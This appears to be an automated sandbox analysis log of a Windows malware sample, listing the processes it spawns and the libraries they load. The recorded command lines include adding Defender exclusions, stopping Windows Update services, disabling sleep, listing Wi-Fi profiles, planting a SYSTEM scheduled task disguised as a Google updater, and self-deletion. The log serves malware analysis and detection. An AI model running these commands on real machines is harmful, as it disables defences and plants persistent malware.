Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files\Google\Chrome\updater.exe "C:\Program Files\Google\Chrome\updater.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\choice.exe choice /C Y /N /D Y /T 3
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop UsoSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop wuauserv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop bits
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process created: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe "C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe"	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process created: C:\Windows\System32\cmd.exe "cmd" /C chcp 65001 && netsh wlan show profiles \| findstr All	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe	Process created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#irktvxcx#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr All	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop UsoSvc	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop wuauserv	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop bits	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop dosvc	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files\Google\Chrome\updater.exe "C:\Program Files\Google\Chrome\updater.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\choice.exe choice /C Y /N /D Y /T 3
Source: C:\Program Files\Google\Chrome\updater.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Source: C:\Program Files\Google\Chrome\updater.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
Source: C:\Program Files\Google\Chrome\updater.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\updater.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\updater.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\updater.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\updater.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop UsoSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop wuauserv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop bits
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\zufmUwylvo.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: ifmon.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: mprapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rasmontr.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: mfc42u.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: authfwcfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpolicyiomgr.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: dhcpcmonitor.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: dot3cfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: dot3api.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: onex.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: eappcfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: eappprxy.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: fwcfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: hnetmon.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: netshell.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: netsetupapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: netiohlp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: nettrace.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: nshhttp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: httpapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: nshipsec.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: activeds.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: polstore.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: winipsec.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: adsldpc.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: adsldpc.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: nshwfp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: p2pnetsh.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: p2p.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rpcnsh.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wcnnetsh.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wlanapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: whhelper.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wlancfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wshelper.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wwancfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wwapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wcmapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: mobilenetworking.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: peerdistsh.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: mprmsg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\findstr.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Section loaded: edgegdi.dll
Source: C:\Windows\System32\dialer.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edgegdi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
